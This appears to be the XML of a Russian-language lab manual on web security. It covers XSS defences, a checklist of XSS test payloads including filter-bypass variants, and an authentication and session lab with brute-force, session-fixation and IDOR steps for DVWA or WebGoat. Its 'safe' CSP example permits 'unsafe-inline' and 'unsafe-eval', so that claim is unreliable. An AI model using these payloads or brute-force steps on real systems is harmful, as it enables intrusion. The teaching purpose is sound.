      </w:r>
    </w:p>
    <w:p w14:paraId="338CEF30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40C0C1CE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4: Методы защиты и санитизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7CC9C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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4.1 Экранирование (Escaping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2EFD3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1AD14F2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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD6FDE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Python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примеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8A77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import html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C905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import markupsafe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B125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import bleach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC0D5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1BF8AC1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1. HTML escaping (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базовый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уровень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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF580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safe_text = html.escape(user_input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211FF8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# &lt;script&gt; → &amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784D43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DCDB9E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2.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Использование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MarkupSafe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386121F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from markupsafe import Markup, escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161CFA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safe = escape(user_input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20685DB0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5EDEF3DE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3. Санитизация с разрешёнными тегами (bleach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E633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clean = bleach.clean(user_input, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36709211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tags=['p', 'b', 'i', 'u', 'br'],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Разрешённые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теги</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0574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attributes={'a': ['href', 'title']},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Разрешённые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атрибуты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4185CD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protocols=['http', 'https'])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Разрешённые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протоколы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B0126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55B6F418">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>4.2 Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF28D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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Пример безопасной CSP-политики:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D250EA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4E8E9E11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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052C379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В заголовках ответа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221D5D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Content-Security-Policy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716887B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default-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767EA08F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script-src 'self' 'unsafe-inline' 'unsafe-eval';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E291E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style-src 'self' 'unsafe-inline';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903F97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img-src 'self' data: https:;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288582FA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connect-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE6E57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font-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBB7F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object-src 'none';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2CD5E5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frame-ancestors 'none';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0E2FA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42168C41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4.3 Защитные механизмы в браузерах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151CEC92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760F8030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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5A4D4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// Безопасная работа с DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281285E">
      <w:pP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</w:p>
    <w:p w14:paraId="7FF65F55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ОПАСНО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4412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element.innerHTML = userInput;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03337592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683208B3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БЕЗОПАСНО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284B0B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element.textContent = userInput;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D413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3B3BACCE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БЕЗОПАСНО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(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санитизацией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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B611BCC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element.innerHTML = DOMPurify.sanitize(userInput);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57744D74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</w:p>
    <w:p w14:paraId="23CC4E28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БЕЗОПАСНОЕ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создание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элементов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF276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var link = document.createElement('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF77036">
      <w:pP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link.textContent = userInput;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// textContent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вместо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innerHTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598A0B5">
      <w:pPr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 xml:space="preserve">link.href = sanitizedUrl;  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// Валидация URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A698FD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709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5: Практическое задание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFA8DC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709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1: Аудит приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BDC888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Найдите все уязвимые места в предоставленном приложении</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2BD42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Для каждого уязвимого места определите тип XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E35B20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Оцените потенциальный ущерб</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BC5C7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709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2: Создание защищённой версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F0D07">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709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Модифицируйте приложение, устранив все уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3A60E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Реализуйте экранирование вывода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F62FC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Добавьте санитизацию ввода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C935362">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Реализуйте CSP-заголовки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2C6FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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en-US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Добавьте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>защитные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>куки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HttpOnly, Secure, SameSite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8E9CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709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3: Тестирование на защищённость</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE03C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Протестируйте исправленное приложение с теми же payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A322CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Убедитесь, что эксплуатация невозможна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A55DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567" w:firstLine="851"/>
        <w:jc w:val="both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Проанализируйте, какие меры были наиболее эффективны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C8E6C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3330933C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Часть 6: Чек-лист для тестирования XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31BC7E">
      <w:pPr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698D4201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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A1F11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# Пример чек-листа для автоматического тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6AEEF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>test_payloads = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1E610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Базовые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тесты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903A21E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"&lt;script&gt;alert(1)&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F3C7A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"&lt;img src=x onerror=alert(1)&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FFD85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"&lt;svg onload=alert(1)&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DB20E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59849BA6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Обход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фильтров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5423F8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"&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4B3D0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"&lt;img src=x onerror=\"alert(1)\"&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA320C8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"&lt;img src=x oneonerrorrror=alert(1)&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D79E9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27AAD728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Кодирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CE894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"%3Cscript%3Ealert(1)%3C/script%3E",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4367CE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"&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F23536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04F01743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DOM-based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тесты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B91320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"javascript:alert(1)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F656E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"\" onmouseover=\"alert(1)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B82E647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"'-alert(1)-'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C93045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</w:p>
    <w:p w14:paraId="2C4DB849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en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># SVG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>тесты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA38D9B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"&lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C38EA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en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    "&lt;svg&gt;&lt;animate onbegin=alert(1) attributeName=x&gt;&lt;/svg&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA05F65">
      <w:pPr>
        <w:ind w:left="-567" w:firstLine="709"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C787F3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B5D698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Безопасность и этика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF66F3F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ВАЖНО:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> Все тесты проводите ТОЛЬКО на:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08167831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Собственных приложениях</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D9B08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Специальных обучающих платформах (DVWA, WebGoat, PortSwigger Web Security Academy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62017AB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 разрешения владельца системы (bug bounty программы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCAAA5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Незаконное тестирование может привести к:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB6DAE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Уголовной ответственности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BA239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Блокировке IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B41C5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Юридическим последствиям</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56ECF9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4DCDCE18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Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B684D0D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XSS остается одной из самых распространённых уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60DFDD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Reflected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легче найти, но сложнее эксплуатировать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78E9BD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Stored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опаснее - воздействует на всех пользователей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FABEA4D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DOM-based XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> требует анализа клиентского кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71486283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Защита должна быть многоуровневой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>: валидация + экранирование + CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F833EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Автоматические сканеры не находят все уязвимости</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> - необходим ручной анализ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECDA26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Рекомендуемые инструменты для обучения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579AF7C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Burp Suite Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DF886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OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0243E34E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PortSwigger Web Security Academy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173EAC7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E705B8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en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F104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ПРАКТИЧЕСКАЯ РАБОТА №4: ОБХОД АУТЕНТИФИКАЦИИ И УПРАВЛЕНИЯ СЕССИЯМИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8D66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</w:p>
    <w:p w14:paraId="6D71840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Важное предупреждение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E419B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Эта работа предназначена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>исключительно для образовательных целей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> в контролируемых лабораторных условиях с разрешения владельцев тестируемых систем. Несанкционированный доступ к компьютерным системам является незаконным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBCC2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 работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9427B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Изучение распространенных уязвимостей в механизмах аутентификации и управления сессиями, а также методов их устранения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3B99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3FB3E591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Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AD45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 Распространенные уязвимости аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A315105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1.1. Слабая политика паролей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDFBD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Короткие или простые пароли</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB43F5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требований к сложности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE3E86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Возможность использования стандартных паролей (admin/admin, password, 123456)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E17FA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1.2. Уязвимости в восстановлении пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC30B8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Предсказуемые токены сброса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15DC0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Ответы на секретные вопросы, которые можно угадать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6186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лимита попыток</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36034C4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1.3. Небезопасная передача учетных данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37917132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HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0503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Хранение паролей в открытом виде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44036CDC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Передача в URL-параметрах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527403F2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 Уязвимости управления сессиями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C8347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2.1. Небезопасные идентификаторы сессий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691224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Последовательные или предсказуемые session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DDCDD8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Session ID в URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202ECA90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ротации session ID после входа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DA9C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2.2. Неправильное время жизни сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13077C0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Слишком длинные сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212EFE7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таймаута неактивности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E55C8C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Неправильная реализация "запомнить меня"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C329C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2.3. Уязвимости выхода из системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE7D0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Сессия не уничтожается при logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EBCF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Токены не инвалидируются</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C470F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Возможность повторного использования сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EFC78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3C982C4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Практические задания (для лабораторной среды)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8ACB1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1: Анализ слабых учетных данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35D28C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Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверить устойчивость системы к подбору паролей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB334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Инструменты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C072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Burp Suite Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA8E6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Списки распространенных паролей (rockyou.txt, seclists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF6B4BB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Шаги:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35802833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Запустить тестовое приложение (например, OWASP WebGoat или DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10930432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Перехватить запрос аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7314B991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Использовать Intruder для подбора стандартных учетных данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1FF3D9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Проанализировать результаты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAB58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2: Анализ механизма восстановления пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73EDD0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Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> выявить уязвимости в процессе сброса пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C772D9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Шаги:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DACD5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Инициировать процесс восстановления пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C6E8C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Проанализировать токен сброса (длина, энтропия, время жизни)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A9E4C6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Проверить, можно ли предсказать следующий токен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA59B2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Проверить лимит попыток ввода токена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FCC5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3: Анализ управления сессиями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45200FA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Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучить уязвимости в механизме сессий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05943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Шаги:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43150429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Войти в систему и получить session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D79A1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Проанализировать session ID (длина, структура)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FDC11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Проверить, меняется ли session ID после аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA7C6C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Проверить возможность session fixation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B42C00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Протестировать механизм logout на полное уничтожение сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808E41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Задание 4: Тестирование контроля доступа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822923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Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверить возможность вертикального/горизонтального эскалации привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FC4E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Шаги:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41E753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Войти с учетной записью пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47543C56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Попытаться получить доступ к административным функциям</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B7946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Проверить, можно ли получить доступ к данным других пользователей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38883797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Протестировать прямые ссылки на объекты (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9686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35B8363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Методы защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770528FB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1. Защита аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C022431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Многофакторная аутентификация (2FA/MFA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19331AC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Строгие требования к паролям (мин. 12 символов, сложность)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897403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Защита от bruteforce (капча, ограничение попыток, блокировка)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87B52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Безопасное хранение паролей (соление, хеширование)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E83D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2. Безопасное управление сессиями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B53EE85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Генерация случайных session ID достаточной длины</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF25F5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Использование Secure и HttpOnly флагов для куков</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640BD10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Обязательное использование HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1DF96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Регулярная ротация session ID</w:t>
      </w:r>
    </w:p>
